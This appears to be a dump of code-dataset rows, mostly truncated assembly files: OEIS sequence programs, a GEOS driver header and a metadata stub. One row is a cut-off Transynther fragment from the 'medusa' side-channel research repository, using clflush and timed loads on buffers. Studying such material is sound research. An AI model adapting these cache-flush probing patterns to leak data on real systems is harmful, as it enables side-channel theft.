] | 4 | 2021-08-29T19:55:49.000Z | 2022-02-15T08:30:15.000Z | ; --------------------------------------
Start:
; Turn LCD back light off.
mvi a,0
out 1
hlt
; Turn LCD back light on.
mvi a,1
out 1
... | 31.387097 | 80 | 0.20555 |
dae34ca6340f71fb53ef469cf6b928cb98b6b315 | 4,388 | asm | Assembly | Transynther/x86/_processed/P/_zr_/i3-7100_9_0x84_notsx.log_9_547.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/P/_zr_/i3-7100_9_0x84_notsx.log_9_547.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/P/_zr_/i3-7100_9_0x84_notsx.log_9_547.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r12
push %r13
push %r14
push %r9
push %rbp
push %rcx
push %rdi
push %rsi
lea addresses_normal_ht+0xdc99, %r9
clflush (%r9)
nop
nop
nop
sub %r12, %r12
mov (%r9), %ecx
nop
nop
cmp $52240, %rbp
lea addresses_D_ht+0x6e49, %r13
clflush (%r13)
and %rcx, %rcx
movb (%r13), %r1... | 20.221198 | 152 | 0.652461 |
f82b2854313156eb4bf38012d6b2eda4fa1a3b2f | 486 | asm | Assembly | programs/oeis/262/A262011.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/262/A262011.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/262/A262011.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A262011: a(n) = (1/n!) * Product_{k=1..n} (k^3 + 1).
; 1,2,9,84,1365,34398,1244061,61136712,3920391657,317987323290,31830531061329,3854387943062748,555353062796290941,93897387078942114486,18410594823692578876005,4143611208319076419026192,1061023445030203505546894289,306698188757554119191614031538,99387251945711843180... | 24.3 | 277 | 0.734568 |
a690a11049670a277b7af53523cd61b6c536ef5c | 9,834 | asm | Assembly | Driver/Video/Dumb/VidMem/CMYK/cmykTables.asm | steakknife/pcgeos | 95edd7fad36df400aba9bab1d56e154fc126044a | [
"Apache-2.0"
] | 504 | 2018-11-18T03:35:53.000Z | 2022-03-29T01:02:51.000Z | Driver/Video/Dumb/VidMem/CMYK/cmykTables.asm | steakknife/pcgeos | 95edd7fad36df400aba9bab1d56e154fc126044a | [
"Apache-2.0"
] | 96 | 2018-11-19T21:06:50.000Z | 2022-03-06T10:26:48.000Z | Driver/Video/Dumb/VidMem/CMYK/cmykTables.asm | steakknife/pcgeos | 95edd7fad36df400aba9bab1d56e154fc126044a | [
"Apache-2.0"
] | 73 | 2018-11-19T20:46:53.000Z | 2022-03-29T00:59:26.000Z |
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Copyright (c) GeoWorks 1991 -- All Rights Reserved
PROJECT: PC GEOS
MODULE: Video driver
FILE: cmykTables.asm
AUTHOR: Jim DeFrisco
REVISION HISTORY:
Name Date Description
---- ---- -----------
jad 12/91 initial vers... | 34.87234 | 80 | 0.650702 |
3e5942e2f77d4b3b5edba51615ec660308ac5219 | 299 | asm | Assembly | programs/oeis/159/A159325.asm | jmorken/loda | 99c09d2641e858b074f6344a352d13bc55601571 | [
"Apache-2.0"
] | 1 | 2021-03-15T11:38:20.000Z | 2021-03-15T11:38:20.000Z | programs/oeis/159/A159325.asm | jmorken/loda | 99c09d2641e858b074f6344a352d13bc55601571 | [
"Apache-2.0"
] | null | null | null | programs/oeis/159/A159325.asm | jmorken/loda | 99c09d2641e858b074f6344a352d13bc55601571 | [
"Apache-2.0"
] | null | null | null | ; A159325: Median number of comparisons used by insertion sort on n (distinct) elements.
; 0,1,3,5,8,11,15,19,24,30,36,42,49,56,64,73,82,91,101,111,122,134,146,158,171,185
mov $2,$0
mul $0,2
mov $1,$0
lpb $0
mul $1,2
pow $1,2
mov $3,$0
mov $0,1
mul $3,2
lpe
add $1,$3
div $1,63
add $1,$2
| 17.588235 | 88 | 0.628763 |
1a45d6821e4466d2f0bf7b530c58cc6b0edfba4a | 144 | asm | Assembly | other.7z/SFC.7z/SFC/ソースデータ/ヨッシーアイランド/日本_Ver1/sfc/ys_w13.asm | prismotizm/gigaleak | d082854866186a05fec4e2fdf1def0199e7f3098 | [
"MIT"
] | null | null | null | other.7z/SFC.7z/SFC/ソースデータ/ヨッシーアイランド/日本_Ver1/sfc/ys_w13.asm | prismotizm/gigaleak | d082854866186a05fec4e2fdf1def0199e7f3098 | [
"MIT"
] | null | null | null | other.7z/SFC.7z/SFC/ソースデータ/ヨッシーアイランド/日本_Ver1/sfc/ys_w13.asm | prismotizm/gigaleak | d082854866186a05fec4e2fdf1def0199e7f3098 | [
"MIT"
] | null | null | null | Name: ys_w13.asm
Type: file
Size: 27621
Last-Modified: '2016-05-13T04:51:16Z'
SHA-1: 6D51F1D542343A523A8198ADA1505263F2F29AE8
Description: null
| 20.571429 | 47 | 0.8125 |
9d7ad84438be122485d56d064c00d969e85853a1 | 474 | asm | Assembly | oeis/237/A237353.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/237/A237353.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/237/A237353.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A237353: For n=g+h, a(n) is the minimum value of omega(g)+omega(h).
; Submitted by Jon Maiga
; 0,1,1,1,1,2,1,1,1,2,1,2,1,2,2,1,1,2,1,2,2,2,1,2,1,2,1,2,1,2,1,1,2,2,2,2,1,2,2,2,1,2,1,2,2,2,1,2,1,2,2,2,1,2,2,2,2,2,1,2,1,2,2,1,2,2,1,2,2,2,1,2,1,2,2,2,2,2,1,2,1,2,1,2,2,2,2,2,1,2,2,2,2,2,2,2,1,2,2,2
lpb $0
mov $2,$0
m... | 33.857143 | 201 | 0.586498 |
56ee7e65bd158f29651bf696542f60d22118f7a6 | 2,731 | asm | Assembly | programs/oeis/017/A017206.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/017/A017206.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/017/A017206.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A017206: a(n) = (9*n + 3)^10.
; 59049,61917364224,16679880978201,590490000000000,8140406085191601,64925062108545024,362033331456891249,1568336880910795776,5631351470947265625,17490122876598091776,48398230717929318249,121899441999475713024,283942098606901565601,619173642240000000000,1276136419117121619201,250490271811... | 390.142857 | 2,669 | 0.9513 |
959876bfd8743ff3543af33459e9ab762d9988be | 690 | asm | Assembly | oeis/090/A090300.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/090/A090300.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/090/A090300.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A090300: a(n) = 14*a(n-1) + a(n-2), starting with a(0) = 2 and a(1) = 14.
; Submitted by Jon Maiga
; 2,14,198,2786,39202,551614,7761798,109216786,1536796802,21624372014,304278004998,4281516441986,60245508192802,847718631141214,11928306344169798,167844007449518386,2361744410637427202,33232265756373499214,4676134649998... | 43.125 | 478 | 0.810145 |
f88881337acc6acb2f890d411162438017f4d1f2 | 549 | asm | Assembly | oeis/010/A010985.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/010/A010985.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/010/A010985.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A010985: Binomial coefficient C(n,32).
; 1,33,561,6545,58905,435897,2760681,15380937,76904685,350343565,1471442973,5752004349,21090682613,73006209045,239877544005,751616304549,2254848913647,6499270398159,18053528883775,48459472266975,125994627894135,317986441828055,780512175396135,1866442158555975,4355031703297275,99... | 91.5 | 486 | 0.894353 |
b17f32a658371ca78e0ef1894241647ab70afca5 | 267 | asm | Assembly | programs/oeis/056/A056810.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/056/A056810.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/056/A056810.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A056810: Numbers whose fourth power is a palindrome.
; 0,1,11,101,1001,10001,100001,1000001,10000001,100000001,1000000001
sub $0,1
mov $2,$0
mov $3,$0
lpb $3
div $2,3
max $2,1
sub $3,2
lpe
mov $1,10
pow $1,$0
mov $4,$1
cmp $4,0
add $1,$4
add $1,$2
mov $0,$1
| 14.052632 | 68 | 0.644195 |
898e1014592fe4bf59e2c02b6cfc32e06adda591 | 501 | asm | Assembly | programs/oeis/314/A314668.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | programs/oeis/314/A314668.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | programs/oeis/314/A314668.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | ; A314668: Coordination sequence Gal.6.115.6 where G.u.t.v denotes the coordination sequence for a vertex of type v in tiling number t in the Galebach list of u-uniform tilings.
; 1,5,9,13,17,21,25,29,33,37,41,45,50,55,59,63,67,71,75,79,83,87,91,95,100,105,109,113,117,121,125,129,133,137,141,145,150,155,159,163,167,171... | 26.368421 | 177 | 0.668663 |
854aad4c1338bfec8d56870ed6dc338a9742e13a | 1,536 | asm | Assembly | stats/customtext.asm | KScl/z3rasm | 7739c9bd6a0c803b1e4e1f435af3178b8e04207b | [
"MIT"
] | null | null | null | stats/customtext.asm | KScl/z3rasm | 7739c9bd6a0c803b1e4e1f435af3178b8e04207b | [
"MIT"
] | null | null | null | stats/customtext.asm | KScl/z3rasm | 7739c9bd6a0c803b1e4e1f435af3178b8e04207b | [
"MIT"
] | null | null | null | ;================================================================================
; Text written by the randomizer
;--------------------------------------------------------------------------------
table "textmaps/credit_b_hi.map"
YourSpriteCreditsHi:
db 2, 55 : db " " ; $23F002
table "textma... | 33.391304 | 81 | 0.413411 |
3a13410b5c15df2931e43598a633ba1984716789 | 252 | asm | Assembly | libsrc/_DEVELOPMENT/sound/bit/c/sdcc_ix/bit_beep_di.asm | meesokim/z88dk | 5763c7778f19a71d936b3200374059d267066bb2 | [
"ClArtistic"
] | null | null | null | libsrc/_DEVELOPMENT/sound/bit/c/sdcc_ix/bit_beep_di.asm | meesokim/z88dk | 5763c7778f19a71d936b3200374059d267066bb2 | [
"ClArtistic"
] | null | null | null | libsrc/_DEVELOPMENT/sound/bit/c/sdcc_ix/bit_beep_di.asm | meesokim/z88dk | 5763c7778f19a71d936b3200374059d267066bb2 | [
"ClArtistic"
] | null | null | null |
; void bit_beep_di(uint16_t duration_ms, uint16_t frequency_hz)
SECTION code_sound_bit
PUBLIC _bit_beep_di
EXTERN l0_bit_beep_di_callee
_bit_beep_di:
pop af
pop hl
pop de
push de
push hl
push af
jp l0_bit_beep_di_callee
| 12 | 63 | 0.746032 |
72c8d1e8a6ae1531ae3d1fdc39a978bc0cf55a28 | 335 | asm | Assembly | programs/oeis/021/A021088.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/021/A021088.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/021/A021088.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A021088: Decimal expansion of 1/84.
; 0,1,1,9,0,4,7,6,1,9,0,4,7,6,1,9,0,4,7,6,1,9,0,4,7,6,1,9,0,4,7,6,1,9,0,4,7,6,1,9,0,4,7,6,1,9,0,4,7,6,1,9,0,4,7,6,1,9,0,4,7,6,1,9,0,4,7,6,1,9,0,4,7,6,1,9,0,4,7,6,1,9,0,4,7,6,1,9,0,4,7,6,1,9,0,4,7,6,1
add $0,1
mov $1,10
pow $1,$0
sub $1,6
mul $1,9
div $1,18
add $1,4
div $1,42
mod $... | 23.928571 | 199 | 0.540299 |
e2a95db76d974a44da50ef91b2b99e23f5d20827 | 553 | asm | Assembly | programs/oeis/100/A100036.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/100/A100036.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/100/A100036.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A100036: a(n) = smallest m such that A100035(m) = n.
; 1,2,3,5,7,12,14,23,25,38,40,57,59,80,82,107,109,138,140,173,175,212,214,255,257,302,304,353,355,408,410,467,469,530,532,597,599,668,670,743,745,822,824,905,907,992,994,1083,1085,1178,1180,1277,1279,1380
mov $1,$0
lpb $0,4
seq $0,20639 ; Lpf(n): least prime div... | 27.65 | 204 | 0.631103 |
2669c4dbe2b251542d694829efb3dc8c58b384f2 | 37 | asm | Assembly | test/assembler/push_i16_v/data/program.asm | jfitz/virtual-processor | b6aa15e7ed210ab862c9c80bbc7c46859ab50501 | [
"MIT"
] | null | null | null | test/assembler/push_i16_v/data/program.asm | jfitz/virtual-processor | b6aa15e7ed210ab862c9c80bbc7c46859ab50501 | [
"MIT"
] | null | null | null | test/assembler/push_i16_v/data/program.asm | jfitz/virtual-processor | b6aa15e7ed210ab862c9c80bbc7c46859ab50501 | [
"MIT"
] | null | null | null | MAIN: PUSH I16 14920
OUT
OUT
EXIT
| 7.4 | 20 | 0.702703 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.